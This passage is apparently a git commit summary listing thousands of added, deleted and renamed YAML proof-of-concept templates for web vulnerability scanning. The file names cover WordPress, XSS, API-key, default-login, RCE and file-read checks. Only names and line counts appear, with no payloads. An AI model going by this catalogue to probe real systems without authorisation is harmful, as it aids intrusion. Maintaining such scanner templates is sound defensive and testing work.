| 3 +- poc/web/saia-web-server-info.yaml | 20 + poc/web/sap-netweaver-webgui.yaml | 20 - poc/web/sap-web-dispatcher-10078.yaml | 9 +- ...sap-web-dispatcher-admin-portal-10071.yaml | 32 + poc/web/slack-webhook(1).yaml | 16 + poc/web/slack-webhook-11865.yaml | 13 - poc/web/slack-webhook.yaml | 4 - poc/web/spark-webui-unauth-10401.yaml | 26 + poc/web/spark-webui-unauth.yaml | 15 +- poc/web/synology-web-station-10631.yaml | 19 +- poc/web/synology-web-station-10632.yaml | 18 +- poc/web/web-config-11125.yaml | 24 - poc/web/web-ftp-detect-11136.yaml | 28 - poc/web/web-ftp-detect-11137.yaml | 43 +- poc/web/web-local-craft-11139.yaml | 19 + poc/web/web-local-craft-11141.yaml | 20 - poc/web/web-service-panel.yaml | 22 +- poc/web/web-suite-detect-11168.yaml | 36 + poc/web/web-suite-detect.yaml | 31 - poc/web/webcamxp-5-11122.yaml | 34 - poc/web/webcamxp-5.yaml | 21 + poc/web/webeditors-11129.yaml | 28 - poc/web/webflow-takeover-11131.yaml | 15 - poc/web/webflow-takeover-11133.yaml | 15 + poc/web/webflow-takeover.yaml | 2 +- poc/web/weblogic-iiop-detect-11148.yaml | 4 - poc/web/weblogic-t3-detect-11151.yaml | 23 +- ...152.yaml => weblogic-t3-detect-11153.yaml} | 0 poc/web/weblogic-weak-login-11154.yaml | 68 - poc/web/weblogic-weak-login-11155.yaml | 14 +- poc/web/webmodule-ee-11162.yaml | 19 + poc/web/webmodule-ee-11164.yaml | 22 - ...160.yaml => webmodule-ee-panel-11161.yaml} | 0 poc/web/webmodule-ee.yaml | 2 + poc/web/webtools-home.yaml | 13 +- poc/web/webui-rce-11170.yaml | 21 - poc/web/webui-rce-11174.yaml | 20 + poc/web/webui-rce.yaml | 1 + ...webview-addjavascript-interface-11175.yaml | 5 +- ...ebview-addjavascript-interface-11176.yaml} | 0 poc/web/webview-javascript.yaml | 11 +- poc/web/webview-load-url-11180.yaml | 13 + poc/web/webview-load-url-11182.yaml | 12 - poc/web/webview-universal-access-11183.yaml | 5 +- poc/web/webview-universal-access.yaml | 14 +- poc/web/xp-webcam.yaml | 22 - poc/web/zoho-webhook-token-11835.yaml | 2 +- poc/wordpress/alfacgiapi-wordpress-256.yaml | 62 +- poc/wordpress/alfacgiapi-wordpress.yaml | 33 - .../dahua-wpms-addimgico-fileupload.yaml | 78 +- poc/wordpress/easy-wp-smtp-listing-7156.yaml | 19 + poc/wordpress/easy-wp-smtp-listing-7157.yaml | 21 - poc/wordpress/easy-wp-smtp-listing.yaml | 5 +- poc/wordpress/feedwordpress-xss-7459.yaml | 35 + .../nativechurch-wp-theme-lfd-9001.yaml | 26 - .../nativechurch-wp-theme-lfd-9002.yaml | 14 +- .../trilithic-viewpoint-default-10835.yaml | 39 - .../viewpoint-system-status-11018.yaml | 8 +- .../viewpoint-system-status-11019.yaml | 20 - poc/wordpress/wordpress-LFI.yaml | 6 +- .../wordpress-accessible-wpconfig-11235.yaml | 38 - .../wordpress-accessible-wpconfig-11238.yaml | 12 +- .../wordpress-affiliatewp-log-11240.yaml | 23 - .../wordpress-affiliatewp-log-11242.yaml | 23 + poc/wordpress/wordpress-affiliatewp-log.yaml | 11 +- ...ordpress-bbpress-plugin-listing-11245.yaml | 3 +- .../wordpress-bbpress-plugin-listing.yaml | 23 + poc/wordpress/wordpress-db-repair-11252.yaml | 35 + ...58.yaml => wordpress-debug-log-11259.yaml} | 0 ...11261.yaml => wordpress-detect-11260.yaml} | 0 poc/wordpress/wordpress-detect.yaml | 57 +- .../wordpress-directory-listing-11266.yaml | 10 +- ...ls-verification-for-woocommerce-11271.yaml | 25 +- .../wordpress-emergency-script-11272.yaml | 24 - .../wordpress-emergency-script-11275.yaml | 24 + .../wordpress-emergency-script-11277.yaml | 6 +- poc/wordpress/wordpress-emergency-script.yaml | 14 +- poc/wordpress/wordpress-git-config-11278.yaml | 26 - poc/wordpress/wordpress-git-config-11279.yaml | 16 +- .../wordpress-gotmls-detect-11280.yaml | 30 - poc/wordpress/wordpress-gotmls-detect.yaml | 20 +- ...ress-gtranslate-plugin-listing-11282.yaml} | 0 .../wordpress-gtranslate-plugin-listing.yaml | 22 - ...ordpress-infinitewp-auth-bypass-11287.yaml | 21 +- ...ordpress-infinitewp-auth-bypass-11288.yaml | 60 - ...aml => wordpress-installer-log-11292.yaml} | 0 poc/wordpress/wordpress-installer-log.yaml | 12 +- poc/wordpress/wordpress-lfi.yaml | 21 - poc/wordpress/wordpress-login.yaml | 16 +- .../wordpress-plugins-detect-11298.yaml | 8 +- poc/wordpress/wordpress-plugins-detect.yaml | 30 +- .../wordpress-rce-simplefilelist-11299.yaml | 35 +- .../wordpress-rce-simplefilelist-11304.yaml | 18 +- ...ress-redirection-plugin-listing-11306.yaml | 22 - ...ess-redirection-plugin-listing-11308.yaml} | 0 poc/wordpress/wordpress-takeover-11311.yaml | 6 +- poc/wordpress/wordpress-takeover-11312.yaml | 23 + poc/wordpress/wordpress-takeover-11313.yaml | 22 - .../wordpress-themes-detect-11316.yaml | 22 + poc/wordpress/wordpress-themes-detect.yaml | 22 +- poc/wordpress/wordpress-themes2.yaml | 11 +- ...s-total-upkeep-backup-download-11324.yaml} | 0 ...ordpress-total-upkeep-backup-download.yaml | 13 +- .../wordpress-updraftplus-pem-key.yaml | 12 +- poc/wordpress/wordpress-user-enum-11330.yaml | 11 +- .../wordpress-weak-credentials-11336.yaml | 43 + .../wordpress-weak-credentials-11337.yaml | 37 - poc/wordpress/wordpress-weak-credentials.yaml | 17 +- .../wordpress-woocommerce-listing-11338.yaml | 7 +- .../wordpress-woocommerce-listing-11339.yaml | 22 - .../wordpress-woocommerce-listing-11341.yaml | 23 + .../wordpress-woocommerce-sqli-11342.yaml | 6 +- .../wordpress-woocommerce-sqli-11345.yaml | 44 - poc/wordpress/wordpress-woosidebars.yaml | 49 - .../wordpress-wordfence-lfi-11346.yaml | 21 + .../wordpress-wordfence-lfi-11348.yaml | 4 +- .../wordpress-wordfence-lfi-11350.yaml | 21 - ...dpress-wordfence-waf-bypass-xss-11353.yaml | 23 +- ...dpress-wordfence-waf-bypass-xss-11354.yaml | 5 +- ...dpress-wordfence-waf-bypass-xss-11356.yaml | 25 - .../wordpress-wordfence-xss-11359.yaml | 8 +- poc/wordpress/wordpress-workflow-11363.yaml | 14 - poc/wordpress/wordpress-workflow-11365.yaml | 29 + poc/wordpress/wordpress-workflow.yaml | 23 +- ...press-wpcourses-info-disclosure-11369.yaml | 34 + ...press-wpcourses-info-disclosure-11371.yaml | 36 - .../wordpress-wpcourses-info-disclosure.yaml | 13 +- .../wordpress-xmlrpc-listmethods-11372.yaml | 23 - ...> wordpress-xmlrpc-listmethods-11374.yaml} | 0 .../wordpress-zebra-form-xss-11378.yaml | 40 - .../wordpress-zebra-form-xss-11379.yaml | 38 + poc/wordpress/wordpress-zebra-form-xss.yaml | 35 +- poc/wordpress/wordpress.yaml | 52062 +++++++++++ poc/wordpress/wp-ambience-xss-11407.yaml | 24 + poc/wordpress/wp-arforms-listing-11415.yaml | 31 + poc/wordpress/wp-code-snippets-xss-11426.yaml | 19 +- ...s-11425.yaml => wp-code-snippets-xss.yaml} | 0 poc/wordpress/wp-config-setup.yaml | 15 +- poc/wordpress/wp-custom-tables-xss-11433.yaml | 26 + poc/wordpress/wp-custom-tables-xss-11434.yaml | 25 - poc/wordpress/wp-custom-tables-xss-11435.yaml | 8 +- poc/wordpress/wp-debug-log.yaml | 58 +- .../wp-email-subscribers-listing-11443.yaml | 3 +- .../wp-email-subscribers-listing.yaml | 23 - poc/wordpress/wp-finder-xss-11445.yaml | 24 - poc/wordpress/wp-finder-xss-11448.yaml | 7 +- poc/wordpress/wp-flagem-xss-11454.yaml | 5 + poc/wordpress/wp-force-ssl.yaml | 59 + .../wp-full-path-disclosure-11455.yaml | 16 + .../wp-full-path-disclosure-11457.yaml | 18 - poc/wordpress/wp-full-path-disclosure.yaml | 9 +- .../wp-grimag-open-redirect-11458.yaml | 17 + .../wp-grimag-open-redirect-11461.yaml | 9 +- .../wp-grimag-open-redirect-11462.yaml | 26 +- ...=> wp-gtranslate-open-redirect-11463.yaml} | 0 .../wp-gtranslate-open-redirect-11465.yaml | 22 - poc/wordpress/wp-haberadam-idor.yaml | 18 +- ...stall-11475.yaml => wp-install-11473.yaml} | 0 poc/wordpress/wp-install.yaml | 22 + .../wp-iwp-client-listing-11478.yaml | 14 +- .../wp-iwp-client-listing-11479.yaml | 17 +- poc/wordpress/wp-javospot-lfi-11482.yaml | 38 + poc/wordpress/wp-javospot-lfi.yaml | 26 - poc/wordpress/wp-knews-xss-11487.yaml | 25 - poc/wordpress/wp-knews-xss-11488.yaml | 29 + .../wp-mailchimp-log-exposure-11494.yaml | 2 +- ...p-memphis-documents-library-lfi-11495.yaml | 38 + ...p-memphis-documents-library-lfi-11496.yaml | 4 +- .../wp-mstore-plugin-listing-11500.yaml | 30 + .../wp-multiple-theme-ssrf-11512.yaml | 4 - .../wp-multiple-theme-ssrf-11513.yaml | 27 + poc/wordpress/wp-nextgen-xss-11516.yaml | 2 +- poc/wordpress/wp-phpfreechat-xss-11524.yaml | 24 - poc/wordpress/wp-phpfreechat-xss-11527.yaml | 8 +- poc/wordpress/wp-phpfreechat-xss-11528.yaml | 2 +- ...p-plugin-1-flashgallery-listing-11530.yaml | 27 + ... => wp-plugin-1-flashgallery-listing.yaml} | 0 .../wp-plugin-utlimate-member-11541.yaml | 7 +- ...l => wp-plugin-utlimate-member-11542.yaml} | 0 ...sting.yaml => wp-popup-listing-11543.yaml} | 0 poc/wordpress/wp-popup-listing-11545.yaml | 10 +- .../wp-prostore-open-redirect-11546.yaml | 17 - .../wp-prostore-open-redirect-11549.yaml | 14 +- .../wp-prostore-open-redirect-11550.yaml | 20 + poc/wordpress/wp-qards-listing-11552.yaml | 21 - poc/wordpress/wp-qards-listing.yaml | 25 + .../wp-revslider-file-download-11554.yaml | 29 + poc/wordpress/wp-revslider-file-download.yaml | 14 +- poc/wordpress/wp-securimage-xss-11556.yaml | 24 + poc/wordpress/wp-securimage-xss-11559.yaml | 2 +- poc/wordpress/wp-securimage-xss-11560.yaml | 25 - ...62.yaml => wp-sfwd-lms-listing-11564.yaml} | 0 poc/wordpress/wp-sfwd-lms-listing-11565.yaml | 3 +- poc/wordpress/wp-simple-fields-lfi-11566.yaml | 19 +- poc/wordpress/wp-simple-fields-lfi-11569.yaml | 20 - poc/wordpress/wp-slideshow-xss-11572.yaml | 28 - poc/wordpress/wp-slideshow-xss-11574.yaml | 29 + poc/wordpress/wp-socialfit-xss-11577.yaml | 4 +- poc/wordpress/wp-super-forms-11585.yaml | 19 +- poc/wordpress/wp-super-forms-11588.yaml | 17 +- poc/wordpress/wp-tinymce-lfi.yaml | 10 +- poc/wordpress/wp-tutor-lfi-11596.yaml | 17 +- ...tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} | 0 poc/wordpress/wp-upload-data-11605.yaml | 5 - poc/wordpress/wp-vault-lfi-11610.yaml | 4 +- .../wp-vault-local-file-inclusion.yaml | 33 + poc/wordpress/wp-whmcs-xss-11614.yaml | 37 + poc/wordpress/wp-whmcs-xss.yaml | 8 +- ...-woocommerce-email-verification-11619.yaml | 47 +- .../wp-woocommerce-file-download-11620.yaml | 38 + .../wp-woocommerce-file-download.yaml | 25 - .../wp-xmlrpc-brute-force-11623.yaml | 2 +- .../wp-xmlrpc-pingback-detection.yaml | 11 +- poc/wordpress/wpdm-cache-session-11436.yaml | 23 + poc/wordpress/wpdm-cache-session-11438.yaml | 24 - poc/wordpress/wpengine-config-check.yaml | 22 - .../wptouch-open-redirect-11592.yaml | 24 + .../wptouch-open-redirect-11595.yaml | 23 +- .../wptouch-plugin-open-redirect.yaml | 13 +- ...pringboot-actuators-jolokia-xxe-10430.yaml | 28 + ...pringboot-actuators-jolokia-xxe-10431.yaml | 31 - poc/xss/aem-setpreferences-xss.yaml | 30 - ...ml => aem-xss-childlist-selector-198.yaml} | 0 poc/xss/aem-xss-childlist-selector.yaml | 37 - poc/xss/basic-xss-prober-698.yaml | 35 - poc/xss/blind-xss-user-agent.yaml | 79 +- poc/xss/blind-xss.yaml | 16 +- poc/xss/ckan-dom-based-xss-992.yaml | 39 +- poc/xss/ckan-dom-based-xss-993.yaml | 42 +- poc/xss/coldfusion-debug-xss-1153.yaml | 31 + poc/xss/coldfusion-debug-xss.yaml | 34 - poc/xss/concrete-xss-1178.yaml | 35 + ...ncrete-xss-1177.yaml => concrete-xss.yaml} | 0 poc/xss/discourse-xss-7014.yaml | 4 +- poc/xss/elex-woocommerce-xss-7199.yaml | 47 - poc/xss/elex-woocommerce-xss.yaml | 35 + ...recms-xss.yaml => empirecms-xss-7218.yaml} | 0 poc/xss/empirecms-xss-7220.yaml | 25 - poc/xss/feedwordpress-xss-7459.yaml | 35 + poc/xss/flow-flow-social-stream-xss-7524.yaml | 41 + poc/xss/flow-flow-social-stream-xss.yaml | 27 - ...fuzzing-xss-get-params-html-injection.yaml | 8 +- poc/xss/global-domains-xss.yaml | 3 +- poc/xss/header_blind_xss-7914.yaml | 14 +- poc/xss/httpbin-xss-8052.yaml | 22 +- poc/xss/id-q-xss.yaml | 4 + poc/xss/kafdrop-xss-8411.yaml | 23 - poc/xss/kafdrop-xss-8414.yaml | 24 +- poc/xss/keycloak-xss-8481.yaml | 5 +- poc/xss/keycloak-xss-8482.yaml | 9 +- poc/xss/laravel-ignition-xss-8593.yaml | 18 +- poc/xss/laravel-ignition-xss.yaml | 30 + poc/xss/microweber-xss.yaml | 7 +- poc/xss/mida-eframework-xss-8868.yaml | 7 +- poc/xss/mida-eframework-xss.yaml | 24 + poc/xss/moodle-filter-jmol-xss-8942.yaml | 13 +- poc/xss/moodle-filter-jmol-xss-8946.yaml | 18 - poc/xss/moodle-xss-8950.yaml | 33 - poc/xss/moodle-xss-8952.yaml | 12 +- poc/xss/my-chatbot-xss.yaml | 13 +- poc/xss/oracle-ebs-xss-9373.yaml | 29 + poc/xss/oracle-ebs-xss-9376.yaml | 33 - poc/xss/oracle-ebs-xss-9377.yaml | 6 +- poc/xss/oracle-siebel-xss-9400.yaml | 25 +- poc/xss/oracle-siebel-xss-9402.yaml | 10 +- poc/xss/parentlink-xss-9467.yaml | 32 + poc/xss/parentlink-xss.yaml | 26 + poc/xss/php-timeclock-xss-9552.yaml | 19 +- poc/xss/php-timeclock-xss-9553.yaml | 45 +- poc/xss/qcubed-xss-9749.yaml | 42 - poc/xss/qcubed-xss.yaml | 27 + poc/xss/rails6-xss-9797.yaml | 17 +- poc/xss/rails6-xss-9798.yaml | 29 +- poc/xss/rockmongo-xss-9902.yaml | 28 - poc/xss/rockmongo-xss-9904.yaml | 23 +- .../nuclei_template.yaml => xss/rxss.yaml} | 0 poc/xss/samsung-wlan-ap-xss-10012.yaml | 25 + poc/xss/samsung-wlan-ap-xss.yaml | 24 - poc/xss/sniplets-xss.yaml | 10 +- poc/xss/squirrelmail-add-xss-10515.yaml | 39 + poc/xss/squirrelmail-add-xss.yaml | 25 - poc/xss/thruk-xss-10758.yaml | 8 +- poc/xss/thruk-xss-10759.yaml | 29 + poc/xss/top-xss-params-10807.yaml | 75 + poc/xss/top-xss-params-10809.yaml | 81 - poc/xss/turbocrm-xss-10848.yaml | 24 +- poc/xss/turbocrm-xss-10851.yaml | 23 +- poc/xss/vanguard-post-xss-10992.yaml | 21 +- poc/xss/vanguard-post-xss-10994.yaml | 23 +- ...r-xss.yaml => wems-manager-xss-11192.yaml} | 0 poc/xss/wems-manager-xss-11194.yaml | 21 +- poc/xss/window-name-domxss-11213.yaml | 81 + poc/xss/window-name-domxss.yaml | 80 - ...dpress-wordfence-waf-bypass-xss-11353.yaml | 23 +- ...dpress-wordfence-waf-bypass-xss-11354.yaml | 5 +- ...dpress-wordfence-waf-bypass-xss-11356.yaml | 25 - poc/xss/wordpress-wordfence-xss-11359.yaml | 8 +- poc/xss/wordpress-zebra-form-xss-11378.yaml | 40 - poc/xss/wordpress-zebra-form-xss-11379.yaml | 38 + poc/xss/wordpress-zebra-form-xss.yaml | 35 +- poc/xss/wp-ambience-xss-11407.yaml | 24 + poc/xss/wp-code-snippets-xss-11426.yaml | 19 +- ...s-11425.yaml => wp-code-snippets-xss.yaml} | 0 poc/xss/wp-custom-tables-xss-11433.yaml | 26 + poc/xss/wp-custom-tables-xss-11434.yaml | 25 - poc/xss/wp-custom-tables-xss-11435.yaml | 8 +- poc/xss/wp-finder-xss-11445.yaml | 24 - poc/xss/wp-finder-xss-11448.yaml | 7 +- poc/xss/wp-flagem-xss-11454.yaml | 5 + poc/xss/wp-knews-xss-11487.yaml | 25 - poc/xss/wp-knews-xss-11488.yaml | 29 + poc/xss/wp-nextgen-xss-11516.yaml | 2 +- poc/xss/wp-phpfreechat-xss-11524.yaml | 24 - poc/xss/wp-phpfreechat-xss-11527.yaml | 8 +- poc/xss/wp-phpfreechat-xss-11528.yaml | 2 +- poc/xss/wp-securimage-xss-11556.yaml | 24 + poc/xss/wp-securimage-xss-11559.yaml | 2 +- poc/xss/wp-securimage-xss-11560.yaml | 25 - poc/xss/wp-slideshow-xss-11572.yaml | 28 - poc/xss/wp-slideshow-xss-11574.yaml | 29 + poc/xss/wp-socialfit-xss-11577.yaml | 4 +- poc/xss/wp-whmcs-xss-11614.yaml | 37 + poc/xss/wp-whmcs-xss.yaml | 8 +- 5021 files changed, 255291 insertions(+), 71831 deletions(-) delete mode 100644 poc/adobe/adobe-coldfusion-detect-82.yaml create mode 100644 poc/adobe/adobe-coldfusion-error-detect-86.yaml rename poc/adobe/{adobe-coldfusion-error-detect-88.yaml => adobe-coldfusion-error-detect.yaml} (100%) create mode 100644 poc/adobe/adobe-component-login-89.yaml delete mode 100644 poc/adobe/adobe-component-login-90.yaml create mode 100644 poc/adobe/adobe-component-login-91.yaml rename poc/adobe/{adobe-connect-central-login-93.yaml => adobe-connect-central-login-96.yaml} (100%) delete mode 100644 poc/adobe/adobe-connect-username-exposure-100.yaml delete mode 100644 poc/adobe/adobe-connect-version-104.yaml rename poc/adobe/{adobe-connect-version-102.yaml => adobe-connect-version.yaml} (100%) delete mode 100644 poc/adobe/adobe-experience-manager-login-105.yaml create mode 100644 poc/adobe/adobe-experience-manager-login-106.yaml create mode 100644 poc/adobe/adobe-media-server-114.yaml delete mode 100644 poc/adobe/adobe-media-server.yaml delete mode 100644 poc/adobe/aem-bg-servlet-129.yaml create mode 100644 poc/adobe/aem-bg-servlet.yaml rename poc/adobe/{aem-default-get-servlet-137.yaml => aem-default-get-servlet-135.yaml} (100%) delete mode 100644 poc/adobe/aem-default-login-140.yaml delete mode 100644 poc/adobe/aem-gql-servlet-149.yaml create mode 100644 poc/adobe/aem-gql-servlet-150.yaml delete mode 100644 poc/adobe/aem-groovyconsole-154.yaml delete mode 100644 poc/adobe/aem-jcr-querybuilder-162.yaml create mode 100644 poc/adobe/aem-jcr-querybuilder-165.yaml rename poc/adobe/{aem-login-status-169.yaml => aem-login-status-167.yaml} (100%) delete mode 100644 poc/adobe/aem-merge-metadata-servlet-174.yaml create mode 100644 poc/adobe/aem-querybuilder-internal-path-read-179.yaml delete mode 100644 poc/adobe/aem-querybuilder-internal-path-read-180.yaml create mode 100644 poc/adobe/aem-secrets.yaml delete mode 100644 poc/adobe/aem-setpreferences-xss.yaml delete mode 100644 poc/adobe/aem-userinfo-servlet-192.yaml create mode 100644 poc/adobe/aem-userinfo-servlet-193.yaml rename poc/adobe/{aem-xss-childlist-selector-197.yaml => aem-xss-childlist-selector-198.yaml} (100%) delete mode 100644 poc/adobe/aem-xss-childlist-selector.yaml delete mode 100644 poc/adobe/possible-AEM-secrets.yaml create mode 100644 poc/airflow/airflow-configuration-exposure-230.yaml delete mode 100644 poc/airflow/airflow-configuration-exposure.yaml create mode 100644 poc/airflow/airflow-debug-231.yaml delete mode 100644 poc/airflow/airflow-debug-233.yaml delete mode 100644 poc/airflow/airflow-detect-239.yaml create mode 100644 poc/airflow/airflow-detect-240.yaml create mode 100644 poc/airflow/airflow-panel-242.yaml rename poc/airflow/{airflow-panel-241.yaml => airflow-panel-244.yaml} (100%) create mode 100644 poc/airflow/unauthenticated-airflow-10884.yaml delete mode 100644 poc/airflow/unauthenticated-airflow-10886.yaml create mode 100644 poc/apache/apache-answer-detect.yaml delete mode 100644 poc/apache/apache-apisix-panel-337.yaml create mode 100644 poc/apache/apache-apisix-panel-338.yaml create mode 100644 poc/apache/apache-axis-detect-339.yaml rename poc/apache/{apache-axis-detect.yaml => apache-axis-detect-341.yaml} (100%) delete mode 100644 poc/apache/apache-cocoon-detect-342.yaml create mode 100644 poc/apache/apache-cocoon-detect.yaml rename poc/apache/{apache-detect.yaml => apache-detect-346.yaml} (100%) delete mode 100644 poc/apache/apache-flink-unauth-rce-355.yaml delete mode 100644 poc/apache/apache-httpd-rce-362.yaml create mode 100644 poc/apache/apache-solr-file-read-368.yaml delete mode 100644 poc/apache/apache-solr-file-read-369.yaml create mode 100644 poc/apache/apache-solr-log4j-rce-372.yaml delete mode 100644 poc/apache/default-apache-test-all.yaml delete mode 100644 poc/apache/default-apache2-ubuntu-page.yaml delete mode 100644 poc/api/alfacgiapi-wordpress.yaml delete mode 100644 poc/api/apache-apisix-panel-337.yaml create mode 100644 poc/api/apache-apisix-panel-338.yaml create mode 100644 poc/api/api-abstractapi-383.yaml rename poc/api/{api-abuseipdb-384.yaml => api-abuseipdb-385.yaml} (100%) create mode 100644 poc/api/api-abuseipdb.yaml delete mode 100644 poc/api/api-accuweather-386.yaml create mode 100644 poc/api/api-accuweather.yaml delete mode 100644 poc/api/api-adafruit-io-387.yaml create mode 100644 poc/api/api-adafruit-io.yaml delete mode 100644 poc/api/api-alienvault-388.yaml delete mode 100644 poc/api/api-apigee-edge-391.yaml create mode 100644 poc/api/api-apigee-edge.yaml delete mode 100644 poc/api/api-appveyor-392.yaml create mode 100644 poc/api/api-appveyor.yaml create mode 100644 poc/api/api-bible-394.yaml delete mode 100644 poc/api/api-bible.yaml delete mode 100644 poc/api/api-bingmaps.yaml create mode 100644 poc/api/api-bitrise-397.yaml delete mode 100644 poc/api/api-bitrise.yaml delete mode 100644 poc/api/api-block-400.yaml create mode 100644 poc/api/api-block.yaml delete mode 100644 poc/api/api-blockchain.yaml delete mode 100644 poc/api/api-buildkite.yaml delete mode 100644 poc/api/api-circleci.yaml delete mode 100644 poc/api/api-coinapi-408.yaml create mode 100644 poc/api/api-coinapi.yaml delete mode 100644 poc/api/api-debounce-414.yaml create mode 100644 poc/api/api-debounce.yaml create mode 100644 poc/api/api-deviantart-415.yaml delete mode 100644 poc/api/api-deviantart.yaml rename poc/api/{api-dribbble.yaml => api-dribbble-417.yaml} (100%) create mode 100644 poc/api/api-europeana-420.yaml create mode 100644 poc/api/api-fastly-424.yaml rename poc/api/{api-fastly.yml => api-fastly.yaml} (100%) create mode 100644 poc/api/api-festivo-425.yaml delete mode 100644 poc/api/api-festivo.yaml delete mode 100644 poc/api/api-fullhunt-428.yaml create mode 100644 poc/api/api-fullhunt.yaml create mode 100644 poc/api/api-google-drive-432.yaml delete mode 100644 poc/api/api-google-drive.yaml delete mode 100644 poc/api/api-hirak-rates-436.yaml create mode 100644 poc/api/api-hirak-rates.yaml delete mode 100644 poc/api/api-hubspot.yaml create mode 100644 poc/api/api-iconfinder-439.yaml delete mode 100644 poc/api/api-improvmx-440.yaml create mode 100644 poc/api/api-improvmx.yaml delete mode 100644 poc/api/api-instatus-442.yaml create mode 100644 poc/api/api-instatus.yaml create mode 100644 poc/api/api-intercom-443.yaml delete mode 100644 poc/api/api-intercom.yaml rename poc/api/{api-ipstack.yaml => api-ipstack-444.yaml} (100%) create mode 100644 poc/api/api-iterable-445.yaml delete mode 100644 poc/api/api-iterable.yaml rename poc/api/{api-jumpcloud.yaml => api-jumpcloud-446.yaml} (100%) rename poc/api/{api-lokalise-452.yaml => api-lokalise.yaml} (100%) delete mode 100644 poc/api/api-mailchimp-454.yaml create mode 100644 poc/api/api-malshare.yaml delete mode 100644 poc/api/api-malwarebazaar-458.yaml delete mode 100644 poc/api/api-mapbox.yaml delete mode 100644 poc/api/api-mojoauth-466.yaml create mode 100644 poc/api/api-mojoauth.yaml delete mode 100644 poc/api/api-mywot-468.yaml delete mode 100644 poc/api/api-netlify-470.yaml create mode 100644 poc/api/api-netlify.yaml delete mode 100644 poc/api/api-openweather.yaml rename poc/api/{api-pagerduty.yaml => api-pagerduty-475.yaml} (100%) create mode 100644 poc/api/api-pendo.yaml create mode 100644 poc/api/api-petfinder-480.yaml delete mode 100644 poc/api/api-petfinder.yaml rename poc/api/{api-pivotaltracker.yaml => api-pivotaltracker-482.yaml} (100%) delete mode 100644 poc/api/api-postmark-483.yaml delete mode 100644 poc/api/api-rijksmuseum.yaml create mode 100644 poc/api/api-scanii-488.yaml delete mode 100644 poc/api/api-sendgrid-489.yaml rename poc/api/{api-slack-493.yaml => api-slack.yaml} (100%) create mode 100644 poc/api/api-sonarcloud.yaml delete mode 100644 poc/api/api-spotify-495.yaml create mode 100644 poc/api/api-spotify.yaml rename poc/api/{api-square-496.yaml => api-square.yaml} (100%) delete mode 100644 poc/api/api-sslmate-497.yaml create mode 100644 poc/api/api-sslmate.yaml delete mode 100644 poc/api/api-stripe-499.yaml delete mode 100644 poc/api/api-taiga-501.yaml create mode 100644 poc/api/api-taiga.yaml delete mode 100644 poc/api/api-thecatapi-502.yaml delete mode 100644 poc/api/api-tink-504.yaml create mode 100644 poc/api/api-tink.yaml delete mode 100644 poc/api/api-travisci.yaml delete mode 100644 poc/api/api-visualstudio-513.yaml create mode 100644 poc/api/api-visualstudio.yaml create mode 100644 poc/api/api-wakatime.yaml delete mode 100644 poc/api/api-weglot-516.yaml delete mode 100644 poc/api/api-wordcloud-517.yaml delete mode 100644 poc/api/api-youtube-519.yaml create mode 100644 poc/api/api-youtube.yaml delete mode 100644 poc/api/apiman-panel-462.yaml delete mode 100644 poc/api/bems-api-lfi-709.yaml delete mode 100644 poc/api/bems-api-lfi-712.yaml create mode 100644 poc/api/burp-api-detect-810.yaml delete mode 100644 poc/api/burp-api-detect-812.yaml create mode 100644 poc/api/fastapi-docs-7398.yaml delete mode 100644 poc/api/gmail-api-client-secrets-7741.yaml create mode 100644 poc/api/graylog-api-browser-7846.yaml delete mode 100644 poc/api/graylog-api-browser.yaml delete mode 100644 poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml create mode 100644 poc/api/http-etcd-unauthenticated-api-data-leak.yaml create mode 100644 poc/api/kube-api-namespaces-8505.yaml delete mode 100644 poc/api/kube-api-nodes-8508.yaml delete mode 100644 poc/api/kube-api-nodes.yaml create mode 100644 poc/api/kube-api-pods.yaml create mode 100644 poc/api/magento-2-exposed-api-8688.yaml delete mode 100644 poc/api/mailchimp-api-key-8726.yaml rename poc/api/{mailgun-api-11855.yaml => mailgun-api(1).yaml} (100%) rename poc/api/{strapi-documentation-10543.yaml => strapi-documentation-10542.yaml} (100%) rename poc/api/{strapi-page.yaml => strapi-page-10545.yaml} (100%) create mode 100644 poc/api/stripe-api-key(1).yaml delete mode 100644 poc/api/stripe-api-key-11869.yaml create mode 100644 poc/api/twilio-api-10860.yaml delete mode 100644 poc/api/twilio-api-10861.yaml delete mode 100644 poc/api/unauth-spark-api.yaml delete mode 100644 poc/api/wadl-api-11082.yaml create mode 100644 poc/api/wsdl-api-11634.yaml delete mode 100644 poc/api/wso2-apimanager-detect-11638.yaml create mode 100644 poc/api/yapi-rce-11725.yaml create mode 100644 poc/atlassian/atlassian-bamboo-panel.yaml delete mode 100644 poc/atlassian/atlassian-crowd-panel-583.yaml create mode 100644 poc/atlassian/bitbucket-takeover-738.yaml delete mode 100644 poc/atlassian/bitbucket-takeover-740.yaml delete mode 100644 poc/atlassian/confluence-detect-1187.yaml create mode 100644 poc/atlassian/confluence-detect-1189.yaml create mode 100644 poc/atlassian/confluence-ssrf-sharelinks-1192.yaml delete mode 100644 poc/atlassian/confluence-ssrf-sharelinks-1193.yaml create mode 100644 poc/atlassian/jira-detect-8313.yaml delete mode 100644 poc/atlassian/jira-detect-8314.yaml create mode 100644 poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml delete mode 100644 poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml rename poc/atlassian/{jira-unauthenticated-projectcategories-8332.yaml => jira-unauthenticated-projectcategories.yaml} (100%) create mode 100644 poc/atlassian/jira_user_piker (copy 1).yaml delete mode 100644 poc/auth/Dynatrace-token (copy 1).yaml create mode 100644 poc/auth/Mantis-Default_login.yaml delete mode 100644 poc/auth/Redmine-Default-Login.yaml rename poc/auth/{acemanager-login-23.yaml => acemanager-login-24.yaml} (100%) delete mode 100644 poc/auth/activemq-default-login-44.yaml create mode 100644 poc/auth/activemq-default-login-48.yaml create mode 100644 poc/auth/adobe-component-login-89.yaml delete mode 100644 poc/auth/adobe-component-login-90.yaml create mode 100644 poc/auth/adobe-component-login-91.yaml rename poc/auth/{adobe-connect-central-login-93.yaml => adobe-connect-central-login-96.yaml} (100%) delete mode 100644 poc/auth/adobe-experience-manager-login-105.yaml create mode 100644 poc/auth/adobe-experience-manager-login-106.yaml delete mode 100644 poc/auth/aem-default-login-140.yaml rename poc/auth/{aem-login-status-169.yaml => aem-login-status-167.yaml} (100%) create mode 100644 poc/auth/aem-secrets.yaml rename poc/auth/{aims-password-mgmt-client-218.yaml => aims-password-mgmt-client-219.yaml} (100%) create mode 100644 poc/auth/aims-password-mgmt-client-221.yaml create mode 100644 poc/auth/aims-password-portal-225.yaml create mode 100644 poc/auth/alibaba-mongoshake-unauth-268.yaml delete 